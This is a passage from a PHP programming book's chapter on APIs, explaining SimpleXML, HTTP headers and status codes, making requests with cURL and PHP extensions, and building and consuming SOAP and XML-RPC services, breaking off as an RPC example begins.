</title><time>1330196400</time></concert></concerts>
*/
Let’s start from the top of the file and work through this code example. First of all,
we create a SimpleXMLElement, which expects a well-formed XML string to pass to
the constructor. This is great if we want to read and work with some existing XML
(and will be really handy when we parse incoming requests with XML data in them),
but feels a little clunky when we’re creating the empty element.
Then we move on and start adding elements. In XML, we can’t have enumerated
items; everything needs to be inside a named tag, so each concert item is inside a
tag named concert. When we add a child, we can also assign it to a variable, and
this allows us to continue to operate on it. In this case, we want to add more children
to it, so we capture it in $concert1, and then add the title and time tags as children.
We repeat for the other concerts (you’d probably use a looping construct on data
pulled from elsewhere in a real application), and then output the XML using the
79
80
PHP Master: Write Cutting-edge Code
SimpleXMLElement::asXML() method. This method literally outputs the XML that
this object represents.
When we come to read XML, this is fairly trivial:
chapter_03/xml_load_string.php (excerpt)
$xml = '<concerts><concert><title>The Magic Flute</title><time>➥
1329636600</time></concert><concert><title>Vivaldi Four Seasons➥
</title><time>1329291000</time></concert><concert><title>➥
Mozart\'s Requiem</title><time>1330196400</time></concert>➥
</concerts>';
$concert_list = simplexml_load_string($xml);
print_r($concert_list);
/* output:
SimpleXMLElement Object
(
[concert] => Array
(
[0] => SimpleXMLElement Object
(
[title] => The Magic Flute
[time] => 1329636600
)
[1] => SimpleXMLElement Object
(
[title] => Vivaldi Four Seasons
[time] => 1329291000
)
[2] => SimpleXMLElement Object
(
[title] => Mozart's Requiem
[time] => 1330196400
)
)
)
*/
APIs
When we want to work with XML, we can load it into simplexml_load_string()
(there is also a simplexml_load_file() function). When we inspect this object, we
can see the basic outline of our data, but you may notice that there are multiple
SimpleXMLElement objects showing here. SimpleXML gives us some great features
for iterating over XML data, and for accessing individual elements, so let’s look at
an example—designed for browser output—which shows off some of the functionality:
chapter_03/xml_load_string.php (excerpt)
$xml = '<concerts><concert><title>The Magic Flute</title><time>➥
1329636600</time></concert><concert><title>Vivaldi Four Seasons➥
</title><time>1329291000</time></concert><concert><title>➥
Mozart\'s Requiem</title><time>1330196400</time></concert>➥
</concerts>';
$concert_list = simplexml_load_string($xml);
// show a table of the concerts
echo "<table>\n";
foreach($concert_list as $concert) {
echo "<tr>\n";
echo "<td>" . $concert->title . "</td>\n";
echo "<td>" . date('g:i, jS M',(string)$concert->time) .➥
"</td>\n";
echo "</tr>\n";
}
echo "</table>\n";
// output the second concert title
echo "Featured Concert: " . $concert_list->concert[1]->title;
First, we load the XML into SimpleXML so that we can easily work with it. We then
loop through the items inside it; we can use foreach for this to make it quick and
easy to iterate over our data set.
If we were to inspect each $concert value inside the loop with var_dump(), we’d
see that these are actually SimpleXMLElement objects, rather than plain arrays. When
we echo $concert->title, SimpleXML knows how to represent itself as a string,
and so it just echoes the value of the object as we’d expect. Dealing with the date
formatting is trickier, however! The date() function expects the second parameter
81
82
PHP Master: Write Cutting-edge Code
to be a long number, and gives an error message when you pass in a SimpleXMLElement object instead. You may have already noticed that in the example above, we
have typecast the time property of the $concert object to a string. This is because
SimpleXMLElement knows how to turn itself into a string, and if we supply a string,
PHP will type juggle that to the correct data type for date().
SimpleXMLElement Object Types
When you work with SimpleXML, you can quite often find that there are objects
where you were expecting values. Making use of the approach employed—to
typecast the values where needed—is a nice way of easily working with those
values in a familiar way.
Right at the end of this example, there’s also a “featured concert,” which shows
how SimpleXML makes it easy to drill down through the object structure to reach
the values we’re interested in. Between this feature and the simple iteration abilities
of SimpleXML, you can see it’s a great tool to have in the toolbox when working
with XML data and web services.
HTTP: HyperText Transfer Protocol
HTTP is the wire that web requests and responses are sent over—the underlying
data transfer format. It includes a lot of metadata about the request or response, in
addition to the actual body of that request or response, and we’ll be taking advantage
of that as we work with web services. There are other protocols that we’ll look at,
such as XML-RPC and SOAP, that are built on HTTP. We’ll also be making extensive
use of HTTP’s features when we build RESTful services towards the end of this
chapter.
When we develop simple web applications, it’s possible to do so without paying
much attention to HTTP. But if you intend to look at caching, the delivery of different
file types, and, in particular, how to work with other data formats as we will with
web services, you’ll benefit greatly from a good grounding in HTTP. It might seem
more theoretical, but this section provides real examples and shows off the features
that will help when developing and debugging anything that uses HTTP—so skip
ahead at your peril.
APIs
The HTTP Envelope
Have you ever seen a raw HTTP request and response? Let’s begin by looking at an
example of each, to see the components of the HTTP format. First, the request:
GET / HTTP/1.1
User-Agent: curl/7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3➥
OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.18
Host: www.google.com
Accept: */*
Walking through this example, we first of all see that this was a GET request to the
root page (the simple slash means that there was no trailing information), using
HTTP version 1.1. The next line shows the User-Agent header; this example came
from cURL (a tool for data transfer that we’ll go into further detail on shortly) on
an Ubuntu laptop. The Host header says which domain name this request was made
to and, finally, the Accept header indicates what kind of content will be accepted;
cURL claims to support every possible content type when it says */*.
Now, how about the response?
HTTP/1.1 302 Found
Location: http://www.google.co.uk/
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=7930c24339a6c1b6:FF=0:TM=1311060710:➥
LM=1311060710:S=dNx03utga78C5kXJ; expires=Thu, 18-Jul-2013➥
07:31:50 GMT; path=/; domain=.google.com
Date: Tue, 17 Jan 2012 07:31:50 GMT
Content-Length: 221
<HTML><HEAD><meta http-equiv="content-type" content="text/html;➥
charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.co.uk/">here</A>.
</BODY></HTML>
Again, line by line, we can see that we’re using HTTP 1.1, and that the status of this
response is 302 Found. This is the status code, where 302 means that the content
is elsewhere (we’ll look in more depth at status codes shortly). The Location is the
URL that was requested, and Content-Type tells us what format the body of the
83
84
PHP Master: Write Cutting-edge Code
response is in—this pairs with Content-Length to help us understand what we’ll
find in the body of the response and how to interpret it. The other headers shown
here are the Set-Cookie header, which sends the cookies to use with later requests,
and the Date the response was sent. Finally, we see the actual body content, which
is the HTML for the browser to show in this case.
As you can see, there’s quite a bit of “invisible” content included in the HTTP
format, and we can use this to add to the clarity of communication between client
and server regarding the information we’re asking for, which formats we understand,
and so on. When we work with web services, we’ll be using these headers to enhance
our applications for a more robust and predictable experience all round.
We’ll move on now to look at how you can make and debug HTTP requests, and
then see more information about some of the headers we saw in the previous examples.
Making HTTP Requests
As is so often the case, there are different ways to achieve the same goal. In this
section, we’ll look at making web requests from the command line with cURL, and
also from PHP using both the curl extension and pecl_http.
cURL
The previous example shown is actually the output from a program called cURL,1
which is a simple command line tool for requesting URLs. To request a URL, you
simply type:
curl http://www.google.com/
There are some command line switches that are often useful to combine with cURL.
Table 3.1 shows a small selection of the most used.
1
http://curl.haxx.se/
APIs
Table 3.1. Common command line switches combined with cURL
Switch
Used for
-v
Displaying the verbose output seen in the request/response example
-X <value>
Specifying which HTTP verb to use; e.g. GET, POST
-l
Showing headers only
-d <key>=<value>
Adding a data field to the request
Many web services are simply a case of making requests with complex URLs or data
in the body. Here’s an example of asking the bit.ly2 URL shortener to shorten
http://sitepoint.com:
curl 'http://api.bitly.com/v3/shorten?
login=user&apiKey=secret
&longUrl=http%3A%2F%2Fsitepoint.com'
{ "status_code": 200, "status_txt": "OK", "data": { "long_url":➥
"http:\/\/sitepoint.com\/", "url":
"http:\/\/bit.ly\/qmcGU2", "hash": "qmcGU2", "global_hash":➥
"3mWynL", "new_hash": 1 } }
You can see we simply supply some access credentials and the URL we want to
shorten, and cURL does the rest for us. We’ll look at how to issue the same request
with a variety of approaches.
PHP cURL Extension
The cURL extension in PHP is part of the core language and, as such, is available
on every platform. This makes it a sound choice for an application where having
fewer dependencies is a good trait. The code would look like this:
chapter_03/curl.php
$ch = curl_init('http://api.bitly.com/v3/shorten'
. '?login=user&apiKey=secret'
. '&longUrl=http%3A%2F%2Fsitepoint.com');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
2
http://bit.ly
85
86
PHP Master: Write Cutting-edge Code
print_r(json_decode($result));
/* output:
stdClass Object
(
[status_code] => 200
[status_txt] => OK
[data] => stdClass Object
(
[long_url] => http://sitepoint.com/
[url] => http://bit.ly/qmcGU2
[hash] => qmcGU2
[global_hash] => 3mWynL
[new_hash] => 0
)
)
*/
In this example, we’re using the same URL again to get a short URL from bit.ly. We
initialize a cURL handle using curl_init(), then make a call to curl_setopt().
Without this CURLOPT_RETURNTRANSFER setting, curl_exec() will output the result
rather than returning it! Once the cURL handle is correctly prepared, we call
curl_exec(), which actually makes the request. We store the body of the response
in $result, and since it’s in JSON, this script decodes and then outputs it.
Getting Headers with PHP cURL
This example showed how to get the body of the response, and often that’s all we
want. If you also need header information, however, you can use the curl_info()
function, which returns myriad additional information.
PHP pecl_http Extension
This module is currently excluded by default in PHP, but can easily be installed
via PECL (see Appendix A for more information). It provides a more modern and
approachable interface to working with web requests. If your application needs to
run on a lot of “vanilla” PHP installations, this might be a poor choice, but if you’re
deploying to a platform you control, pecl_http comes highly recommended. Here’s
an example of using it:
APIs
chapter_03/pecl_http.php
$request = new HttpRequest('http://api.bitly.com/v3/shorten'
. '?login=user&apiKey=secret'
. '&longUrl=http%3A%2F%2Fsitepoint.com');
$request->send();
$result = $request->getResponseBody();
print_r(json_decode($result));
/* output:
stdClass Object
(
[status_code] => 200
[status_txt] => OK
[data] => stdClass Object
(
[long_url] => http://sitepoint.com/
[url] => http://bit.ly/qmcGU2
[hash] => qmcGU2
[global_hash] => 3mWynL
[new_hash] => 0
)
)
*/
The structure of code for this simple request looks very much like the one used for
the cURL extension; however, as we add more complex options to it, such as
sending and receiving data and header information, the pecl_http extension is more
intuitive and easier to use. It offers both procedural and object oriented interfaces,
so you can choose whichever suits you or your application best.
PHP Streams
PHP has native handling for streams; if you enable allow_url_fopen in your php.ini
file, you can do this:
$fp = fopen('http://example.com');
This is lovely for file handling, but you might be wondering how it’s useful for APIs.
It’s actually very useful; the example we’ve seen above, using a simple GET request,
can easily be achieved using file_get_contents(), like this:
87
88
PHP Master: Write Cutting-edge Code
chapter_03/streams.php
$result = file_get_contents('http://api.bitly.com/v3/shorten'
. '?login=user&apiKey=secret'
. '&longUrl=http%3A%2F%2Fsitepoint.com');
print_r(json_decode($result));
/* output:
stdClass Object
(
[status_code] => 200
[status_txt] => OK
[data] => stdClass Object
(
[long_url] => http://sitepoint.com/
[url] => http://bit.ly/qmcGU2
[hash] => qmcGU2
[global_hash] => 3mWynL
[new_hash] => 0
)
)
*/
This is a neat way of grabbing a basic request; however, this approach can be extended—just like the cURL and pecl_http extensions—to handle headers and other
request methods. To take advantage of this, use the $context parameter, which accepts a valid context. Create a context using the create_stream_context() function;
the documentation is nice and clear,3 and shows how to set the body content,
headers, and method for the stream. This approach is possibly less intuitive, but it
has the advantage of being available by default on most platforms, so it’s a better
choice where the application needs to tolerate a number of platforms.
HTTP Status Codes
One of the headers we saw returned by cURL in the earlier examples was the status
header, which showed the value 302 Found. Every HTTP response will have a status
code with it, and the codes are the first impression we get of whether the request
was successful, or not, or perhaps something in between. The status codes are always
3
http://php.net/stream_context_create
APIs
three digits, where each hundred represents a different general class of response.
Table 3.2 gives an overview of common status codes.
Table 3.2. Common HTTP status codes and categories
1xx
Information
2xx
Success
200
OK
Everything is fine
201
Created
A resource was created
204
No Content
The request was processed, but nothing needs to be
returned
3xx
Redirect
301
Moved
Permanent redirect; clients should update their links
302
Found
Usually the result of a rewrite rule or similar, here is the
content you asked for, but it was found somewhere
different
304
Not Modified
This relates to caching and is usually used with an empty
body to tell the client to use their cached version
307
Temporary Redirect
This content has moved, but not forever, so don’t update
your links
4xx
Failure
400
Bad Request
Generic “don’t understand” message from the server
401
Not Authorized
You need to supply some credentials to access this
403
Forbidden
You have supplied credentials, but do not have access
rights
404
Not Found
There’s nothing at this URL
406
Not Acceptable
The server cannot supply content which fits with the
Accept headers in the request
5xx
Server Error
500
Internal Server Error
For PHP applications, something went wrong in PHP and
didn’t give Apache any information about what
503
Service Unavailable
Usually a temporary error message shown by an API
When we work with APIs, we’ll make a habit of checking the status code of a response.
89
90
PHP Master: Write Cutting-edge Code
Incorrect Status Codes in APIs
Although this chapter covers the correct theory of using status codes, it isn’t at
all unusual to find APIs in the real world that simply ignore this and return 200
OK for everything. This is poor practice; however, you are likely to come across
this as you integrate against third-party APIs.
As we move through this chapter, looking at publishing our own services, we’ll
include appropriate response headers and discuss, particularly for RESTful services,
how to choose a meaningful value for the status code.
HTTP Headers
There is a vast array of HTTP headers that can be used,4 and they differ according
to the requests and responses. In this section, we’ll take a look at the most common
ones and the information that they carry, and see how we can read and write
headers from our PHP applications. We’ve already seen examples of the headers in
both request and response when we first introduced HTTP, but how does PHP
manage these? Like this:
// Get the headers from $_SERVER
echo "Accept: " . $_SERVER['HTTP_ACCEPT'] . "\n";
echo "Verb: " . $_SERVER['REQUEST_METHOD'] . "\n";
// send headers to the client:
header('Content-Type: text/html; charset=utf8');
header('HTTP/1.1 404 Not Found');
You’ll see this and similar code used throughout the examples in this chapter. We
can get information about the request—including accept headers, and the host,
path, and GET parameters—from the superglobal $_SERVER. We can return headers
to the client simply using the header() function, which is freeform.
Superglobals in PHP
You are doubtlessly familiar with the $_GET and $_POST variables available in
PHP. These are superglobals, which means that they are variables initialized and
4
http://en.wikipedia.org/wiki/HTTP_headers
APIs
populated by PHP, and available in every scope. $_SERVER is another example,
and contains a great deal of useful information about a request.
Headers must be the first thing sent to a client; we can’t start sending the body of a
page, then realize we need to send a header! Sometimes, though, our application
logic does work this way and we can be partway through a script before we know
we need to send a header. For example, we’d need to be a certain way through the
script to realize that a user isn’t logged in and should be sent to the login page. We
would redirect a user with a statement such as:
header('Location: login.php');
However, you will see an error if you call this function after any content has been
returned. Ideally, we’d want to make sure that we send all headers before we send
output, but sometimes that isn’t easy. All is not lost, though, as we can use output
buffering to queue up the content and let the headers go first.
Output buffering can be enabled in your PHP script using ob_start(), or turned
on by default using the php.ini setting output_buffering. Enabling the output buffer
causes PHP to start storing the output of your script rather than sending it to the
client immediately. When you reach the end of your script, or if you call the
ob_flush() function, PHP will then send the content to the client.
If you turn on output buffering and start sending output, and then later send a
header, the header will be sent before the body when the buffer is emptied out to
the client. This allows us to avoid issues where output occurs earlier in the code
than a header being sent.
We already mentioned some common headers in passing, but let’s have a more
formal look at the headers we might use in our applications, in Table 3.3.
91
92
PHP Master: Write Cutting-edge Code
Table 3.3. Commonly used HTTP headers
Header
Direction
Used for
Accept
Request
Stating what format the client would prefer the
response in
Content-Type
Response
Describing the format of the response
Accept-Encoding
Request
Indicating which encodings the client supports
Content-Encoding
Response
Describing the encoding of the response
Accept-Language
Request
Listing languages in order of preference
Content-Language
Response
Describing the language of the response body
Content-Length
Response
Size of the response body
Set-Cookie
Response
Sending cookie data in the response for use with
later requests
Cookie
Request
Cookie data from earlier responses being sent
with a request
Expires
Response
Stating until which point the content is valid
Authorization
Request
Accessing credentials for protected resources
This is by no means an exhaustive list, although if you’d like to see more detail,
there’s a great list on Wikipedia.5 Instead, this outlines some of the headers we’ll
be using on a regular basis, and in particular that we’ll be covering in this chapter.
Web services will bring us into contact with two headers on a regular basis: Accept
and Content-Type.
Accept and Content-Type
These two headers pair together, despite their unrelated names, to perform content
negotiation between the client and the server. Content negotiation is literally negotiating over what format of content will be served in the response. To begin with,
the client makes a request to the server, and includes the Accept header to describe
what kinds of content it can understand. It’s possible to specify which formats are
preferred, too, as shown in this Accept header from Firefox:6
5
6
http://en.wikipedia.org/wiki/HTTP_headers
This is a standard accept header from Firefox 5, which is a nice example.
APIs
Accept: text/html,application/xhtml+xml,application/xml;➥
q=0.9,*/*;q=0.8
Here, we see a series of comma-separated values, and some of these also contain
the semicolon and a q value. So what do these indicate? In fact, the formats without
a q value are the preferred formats, so if a server can provide HTML or XHTML, it
should do that. If not, we fall back to less preferred formats. The default is 1, and
we decrease from there, so our next best option is to serve XML. If the server is
unable to manage that either, the */* indicates that it should send whatever it has,
and the client will do what it can with the result.
Still with us? The Accept header forms part of the request header, and the server
receives that, works out what format to return, and sends the response back with a
Content-Type header. The Content-Type header tells the client what format the
body of the request is in. We need this so that we know how to understand it! Otherwise, we’ll be wondering whether to decode the JSON, parse the XML, or display
the HTML. The Content-Type header is much simpler, since there’s no need to
provide a choice:
Content-Type: text/html
Content Types and Errors
As a rule, we should always return responses in the format in which they are expected. It’s a common mistake to return errors from web services in HTML or
some other format, when the service usually returns JSON. This is confusing for
clients who may be unable to parse the result. Therefore, always be sure to return
in the same format, and set the Content-Type headers correctly for all responses.
In general, these headers are not always well-supported or well-understood. However,
they are the best way of managing content negotiation on the Web, and are recommended practice for doing so.
HTTP Verbs
When we write forms for the Web, we have a choice between the GET method and
the POST method. Here’s a basic form:
93
94
PHP Master: Write Cutting-edge Code
<form action="form.php" method="get">
Name: <input type="text" name="name" />
<input type="submit" value="Save" />
</form>
When we submit the form, the HTTP request that comes into the server looks like
this:
GET /form.php?name=Lorna HTTP/1.1
User-Agent: Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.7.62➥
Version/11.00
Host: localhost
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,➥
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-GB,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://localhost/form.php
If we change the method to POST, the request changes subtly:
POST /form.php HTTP/1.1
User-Agent: Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.7.62➥
Version/11.00
Host: localhost
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,➥
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-GB,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://localhost/form.php
Content-Length: 10
Content-Type: application/x-www-form-urlencoded
name=Lorna
Instead of being on the URL, the data appears in the body of the request, with the
Content-Type set accordingly.
Working with web services, we’ll see a variety of verbs used; most of the time we’re
using GET and POST exactly as we do when we work with forms, and everything you
already know about submitting data still stands to be useful. The other common
APIs
verbs used are in a RESTful service, where we use GET, POST, PUT, and DELETE to
provide us with the ability to create, select, update, and delete data. There is more
about REST later on in this chapter.
Understanding and Choosing Service Types
You’ll have heard of a number of buzzwords for different types of protocol. Let’s
have a look at these terms and what they mean:
RPC
The acronym stands for Remote Procedure Call. What we’re really saying
here is that an RPC service is one where you call a function and pass parameters. You’ll see services described as XML-RPC or JSON-RPC to tell you
what data format they use.
SOAP
This once stood for Simple Object Access Protocol, but since SOAP is anything but simple, it was dropped. Nevertheless, SOAP is a tightly defined,
specific subset of XML-RPC. It’s a verbose XML format, and many programming languages have built-in libraries that can handle SOAP easily—including PHP, which we’ll see later. SOAP services are often described by a WSDL
(Web Service Description Language) document—a set of definitions describing a web service .
REST Unlike the previous two, REST isn’t a protocol. Its exact interface and data
formats are undefined; it’s more of a set of design principles. REST considers
every item to be a resource, and actions are performed by sending the correct
verb to the URL for that resource. Keep reading, as there’s a section dedicated
to REST later in this chapter.
PHP and SOAP
Since PHP 5, we’ve had a great SOAP extension in PHP that makes both publishing
and consuming SOAP services very quick and easy. To illustrate this, we’ll build
a service and then consume it. First, we need to create some functionality for our
service to expose, so we’ll make a class that does a couple of simple tasks:
chapter_03/ServiceFunctions.php
class ServiceFunctions
{
public function getDisplayName($first_name, $last_name) {
95
96
PHP Master: Write Cutting-edge Code
$name = '';
$name .= strtoupper(substr($first_name, 0, 1));
$name .= ' ' . ucfirst($last_name);
return $name;
}
public function countWords($paragraph) {
$words = preg_split('/[. ,!?;]+/',$paragraph);
return count($words);
}
}
As you can see, there’s nothing particularly groundbreaking here, but it does give
us some methods to call with parameters, and some return values to access, which
is all we need for now. Your own examples will be much more interesting!
To make this available as a SOAP service, we’ll use the following code:
include 'ServiceFunctions.php';
$options = array('uri' => 'http://localhost/');
$server = new SoapServer(NULL, $options);
$server->setClass('ServiceFunctions');
$server->handle();
Were you expecting more? This is genuinely all that’s required. The SoapServer
class simply needs to know where to find the functions that the service exposes,
and the call to handle() tells it to go and call the relevant method. This example
uses non-WSDL mode (more on WSDLs in a moment), and so we simply set the
URI in the options array.
We can now consume the service with some similarly straightforward code, which
makes use of the SoapClient class:
$options = array(
'uri' => 'http://localhost',
'location' => 'http://localhost/soap-server.php',
'trace' => 1);
$client = new SoapClient(NULL, $options);
echo $client->getDisplayName('Joe', 'Bloggs');
APIs
/* output:
J Bloggs
*/
Again, this is quite short and sweet—in fact, most of the code is used to set the
entries in the $options array! We set the URI to match the server, and specify where
the location can be found. We also have the trace option enabled, which means we
can use some debugging functions. We instantiate the client, and then call the
functions in the ServiceFunctions class exactly as if it were a local class, despite
the SoapServer being on a remote server and the method call actually going via a
web request.
The debugging functions available to us are:
■ getLastRequest()
■ getLastRequestHeaders()
■ getLastResponse()
■ getLastResponseHeaders()
They show either the XML body or the headers of the request or response, and enable
us to check that we’re sending what we expected to send, as well as the format of
the response before it was parsed (this is very useful for those moments where debug
or unexpected output has been left in on the server side!).
Describing a SOAP Service with a WSDL
The example above used SOAP in a non-WSDL mode, but it is more common, and
perhaps simpler, to use a WSDL with SOAP services. WSDL stands for Web Service
Description Language, and it’s basically a machine-readable specification. A WSDL
describes at which URL a service is located, which methods are available, and what
parameters each method takes.
PHP can’t generate WSDLs itself, and an accurate WSDL will also include information about data types, which of course we lack in PHP. Most of the tools will take
into account any PHPDocumentor comments that you add regarding data types for
parameters, however, which does help. Some IDEs have built-in tools that can create
97
98
PHP Master: Write Cutting-edge Code
a WSDL from a PHP class; alternatively, there is a WSDL generator available from
phpclasses.org.7 Here’s the WSDL for our example class:
chapter_03/wsdl.xml
<?xml version='1.0' encoding='UTF-8'?>
<definitions name="SimpleWSDL" targetNamespace="urn:SimpleWSDL"
xmlns:typens="urn:SimpleWSDL" xmlns:xsd="http://www.w3.org/2001/➥
XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
xmlns="http://schemas.xmlsoap.org/wsdl/">
<message name="countWords"><part name="paragraph"
type="xsd:anyType"></part></message>
<message name="countWordsResponse"></message>
<message name="getDisplayName"><part name="first_name"
type="xsd:anyType"></part><part name="last_name"
type="xsd:anyType"></part></message>
<message name="getDisplayNameResponse"></message>
<portType name="ServiceFunctionsPortType">
<operation name="countWords"><input
message="typens:countWords"></input><output
message="typens:countWordsResponse"></output></operation>
<operation name="getDisplayName"><input
message="typens:getDisplayName"></input><output
message="typens:getDisplayNameResponse"></output></operation>
</portType>
<binding name="ServiceFunctionsBinding"
type="typens:ServiceFunctionsPortType"><soap:binding style="rpc"
transport="http://schemas.xmlsoap.org/soap/http"></soap:binding>
<operation name="countWords">
<soap:operation soapAction="urn:ServiceFunctionsAction">➥
</soap:operation>
<input><soap:body namespace="urn:SimpleWSDL" use="encoded"
encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">➥
</soap:body></input>
<output><soap:body namespace="urn:SimpleWSDL" use="encoded"
encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">➥
</soap:body></output>
</operation>
<operation name="getDisplayName">
<soap:operation soapAction="urn:ServiceFunctionsAction">➥
7
http://www.phpclasses.org/php2wsdl
APIs
</soap:operation>
<input><soap:body namespace="urn:SimpleWSDL" use="encoded"
encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">➥
</soap:body></input>
<output><soap:body namespace="urn:SimpleWSDL" use="encoded"
encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">➥
</soap:body></output>
</operation>
</binding>
<service name="SimpleWSDLService">
<port name="ServiceFunctionsPort"
binding="typens:ServiceFunctionsBinding"><soap:address location=➥
"http://localhost/soapserver.php"></soap:address></port>
</service>
</definitions>
As you can see, this is very definitely aimed at a target audience of machines, rather
than humans. Happily, the tools can generate the WSDL for us, and we can use this
to publish our service. In WSDL mode, we can create a client even more quickly:
ini_set('soap.wsdl_cache_enabled', 0);
$client = new SoapClient('http://localhost/wsdl');
Then we can go on and call the functions against SoapClient exactly as before.
With the WSDL, however, we have some additional functions. The SoapClient
object is aware of the functions available and which parameters can be passed; this
means that it can check we are sending sensible requests before we even send them.
There’s also a method, __getFunctions(), which can tell us which methods are
available on the remote service. We’d call that using this piece of code:
$functions = $client->__getFunctions();
var_dump($functions);
The SoapClient reads the WSDL, and gives us information about the functions in
this service in a format that’s more useful to us than the raw WSDL XML.
99
100
PHP Master: Write Cutting-edge Code
Debugging HTTP
Now that we’ve seen one type of service, it seems like a good time to look at some
tools and strategies for working with HTTP, and troubleshooting web services if we
need to.
Using Logging to Gather Information
It’s common practice to debug a web application by adding some echo and print_r
statements into the code, and observing the output. This becomes trickier when we
work with web services because we’re serving prescriptive data formats that will
become invalid if we add unexpected output into them. To diagnose issues when
we serve APIs, it’s better to log errors, using a process along these lines:
1. Add error_log() entries (or framework-specific error logging, as appropriate)
into your server code.
2. Make a call to the web service, either from PHP or simply using cURL.
3. Check the log files to view the debugging output you added.
Tailing Log Files
It’s rather tedious to keep repeating the above process, but it can be made easier
if you tail the log file. This means leaving the file open and viewed, so that all
new entries to the file appear on screen. On a Unix-based system, you can achieve
this with the command: tail -f <logfile>.
Using this technique, you can check variables and monitor progress of your web
server script without breaking the format of the output returned.
Inspecting HTTP Traffic
This strategy is one of our favorites; the idea is that we have a look at the request
and response messages without making any changes to the application code. There
are two main tools that are commonly used: Wireshark8 and Charles Proxy.9 Although they work in different ways, both perform the basic function of showing us
the requests that we send and receive.
8
9
http://www.wireshark.org/
http://www.charlesproxy.com
APIs
This allows us to observe that the request is well-formed and includes all the values
that we expected. We can also see the response, check headers and status code, and
verify that the content of the body makes sense. It is often at this stage that the plaintext error message can be spotted!
The main advantage of these approaches is that we do not make changes to any part
of the application in order to add debugging. When we observe a problem, we start
inspecting traffic, and simply repeat the same request again.
Inspecting Traffic on Remote Servers
We mentioned the tool Wireshark, which works by taking a copy of the data that
goes over your network card. This is convenient if you’re making requests from
a laptop machine, but not so useful on a server. However, Wireshark can also
understand the output of the program tcpdump, so you can capture traffic on the
server and then use Wireshark to view it in an approachable way.
RPC Services
As stated earlier, RPC stands for Remote Procedure Call, which is to say it’s a service
where we call a function on a remote machine. RPC services can often be lightweight
and simple to work with. As developers, we’re all accustomed to calling functions,
passing in parameters, and getting a return value back. RPC services follow exactly
this pattern, and so they are a familiar way of using web services, even for developers
with no prior experience.
We’ve already seen some examples involving SOAP; SOAP is actually a special
case of an XML-RPC service. The service has a single endpoint, and we direct a
function call to it, supplying any parameters that we need to. RPC services can use
any kind of data format, and are in general quite loosely specified. They’re a good
choice when the features to be exposed over the service are function-based, such
as when an existing library is to be exposed for use over HTTP.
Consuming an RPC Service: Flickr Example
Flickr has a great set of web services, and here we’ll make some calls to its XMLRPC service as an example of how to integrate against this, or a service like it. The
101
102
PHP Master: Write Cutting-edge Code
documentation for Flickr’s API is thorough;10 we’ll now look specifically at its
method to get a list of photos from a group.
First of all, we’ll prepare the XML to send. This includes the name of the function
we’ll call, and the names and values of the parameters we’re going to pass. Here,
we’re using the elePHPant pool on Flickr as an example:
<?xml version="1.0"?>
<methodCall>
<methodName>flickr.groups.pools.getphotos</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>api_key</name>
<value>secret-key</value>
</member>
<member>
<name>group_id</name>
<value>610963@N20</value>
</member>
<member>
<name>per_page</name>
<value>5</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
We hope this is easy enough to follow, with the methodName to say which method
we’re calling and then various params added to the call. If you have an account on
Flickr, you can get an API key from your account page.
All calls to the Flickr API are done via POST, so we can use this call to pass the XML
to Flickr. With the XML stored in the variable $xml, here’s an example of making
the call and pulling the data out of the resulting response:
10
http://www.flickr.com/services/api/flickr.groups.pools.getPhotos.html
APIs
$url = 'http://api.flickr.com/services/xmlrpc/';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $xml);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
$responsexml = new SimpleXMLElement($response);
$photosxml = new SimpleXMLElement(
(string)$responsexml->params->param->value->string);
print_r($photosxml);
There are a few things going on here, but we’ll walk through the script and examine
each piece. First, we initialize a initialize a cURL handle to point to Flickr’s API
also specify that this will be a POST request, that the data to post is in $xml, and that
the response should be returned rather than echoed.
Then we make the call to the web service, and since we’ll have an XML response,
we immediately create a SimpleXMLElement from the response. The SimpleXMLElement parses the resulting XML into a structure we can easily use, so we can retrieve
the main part of the response that we’re interested in. Every child element of a
SimpleXMLElement is also a SimpleXMLElement, but here we want to just use the
XML string, so we cast it to a string.
Finally, we parse the XML we retrieved from the web service response. When we
inspect it with print_r(), we find that there’s a SimpleXMLElement containing one
item with all the data fields as attributes. So for the names of the photos, we can do
this:
foreach($photosxml->photo as $photo) {
echo $photo['title'] . "\n";
}
Note the use of array notation for the attributes of the SimpleXMLElement rather than
object notation, which is used to fetch the children of an object.
103
104
PHP Master: Write Cutting-edge Code
Building an RPC Service
We can build a very simple RPC service quite fast. Remember the class that we used
for our SOAP example? Here it is again:
class ServiceFunctions
{
public function getDisplayName($first_name, $last_name) {
$name = '';
$name .= strtoupper(substr($first_name, 0, 1));
$name .= ' ' . ucfirst($last_name);
return $name;
}
public function countWords($paragraph) {
$words = preg_split('/[. ,!?;]+/',$paragraph);
return count($words);
}
}
For an RPC service, we need users to say which method they want to call, so let’s
require an incoming parameter method. For simplicity, we’ll assume that users want
a JSON response. So here’s a simple index.php example for this service:
chapter_03/index.php
require 'servicefunctions.php';
if(isset($_GET['method'])) {
